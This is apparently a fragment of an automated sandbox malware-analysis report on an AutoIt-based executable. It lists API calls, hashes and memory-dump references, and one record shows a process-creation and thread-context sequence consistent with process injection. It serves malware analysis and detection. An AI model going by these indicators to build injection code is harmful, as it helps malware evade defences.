                                                                                                                                        • API String ID: 2734553683-3436989551
                                                                                                                                        • Opcode ID: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                                                                                                                                        • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                                                                        • Opcode Fuzzy Hash: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                                                                                                                                        • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                                                                        Strings
                                                                                                                                        • C:\Users\user\Desktop\NOAH $$$$.exe, xrefs: 00410107
                                                                                                                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strcat
                                                                                                                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\NOAH $$$$.exe
                                                                                                                                        • API String ID: 1765576173-1192931658
                                                                                                                                        • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                                                        • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                                                                        • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                                                        • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                                        • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                                                        • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                                        • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1794320848-0
                                                                                                                                        • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                                        • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                                                                        • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                                        • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CurrentTerminate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2429186680-0
                                                                                                                                        • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                                        • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                                                                        • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                                        • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 0043214B
                                                                                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                        • _malloc.LIBCMT ref: 0043215D
                                                                                                                                        • _malloc.LIBCMT ref: 0043216F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _malloc$AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 680241177-0
                                                                                                                                        • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                                                        • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                                                                        • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                                                        • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                                                                        APIs
                                                                                                                                        • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$DispatchPeekTranslate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4217535847-0
                                                                                                                                        • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                                                                        • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                                                                                                        • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                                                                        • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                                                                                                        APIs
                                                                                                                                        • __wsplitpath.LIBCMT ref: 004678F7
                                                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast__wsplitpath_malloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4163294574-0
                                                                                                                                        • Opcode ID: 466b4abea8eb3f9882cf6d05d385968ec72279f5f07066920500c3d4079e3d60
                                                                                                                                        • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                                                                                        • Opcode Fuzzy Hash: 466b4abea8eb3f9882cf6d05d385968ec72279f5f07066920500c3d4079e3d60
                                                                                                                                        • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                                                                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                                                                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                                                                        • _strcat.LIBCMT ref: 0040F786
                                                                                                                                          • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                                                                          • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3199840319-0
                                                                                                                                        • Opcode ID: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                                                                                                        • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                                                                        • Opcode Fuzzy Hash: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                                                                                                        • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                                                                                        APIs
                                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeInfoLibraryParametersSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3403648963-0
                                                                                                                                        • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                                        • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                                                        • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                                        • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                                        • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                                                                                        • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                                        • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                        • __lock_file.LIBCMT ref: 00414A8D
                                                                                                                                          • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                                                                        • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2800547568-0
                                                                                                                                        • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                                        • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                                                                                        • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                                        • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                                                                        APIs
                                                                                                                                        • __lock_file.LIBCMT ref: 00415012
                                                                                                                                        • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2999321469-0
                                                                                                                                        • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                                        • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                                                                        • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                                        • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 03FCBBC5
                                                                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03FCBBE9
                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03FCBC0B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2031663945.0000000003FCA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FCA000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3fca000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2438371351-0
                                                                                                                                        • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                                                        • Instruction ID: c46aab4369cf9a6df2575882f43e62c405fb556d854d6a951d614439493771ca
                                                                                                                                        • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                                                        • Instruction Fuzzy Hash: B812BF24E28658C6EB24DF64D8507DEB232EF68300F1050E9910DEB7A5E77A4E85CF5A
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: 64fdff3ae94ab83457d8603152ae0d5fedf77ee6c12e0e45d0860bef15caa14f
                                                                                                                                        • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                                                                        • Opcode Fuzzy Hash: 64fdff3ae94ab83457d8603152ae0d5fedf77ee6c12e0e45d0860bef15caa14f
                                                                                                                                        • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
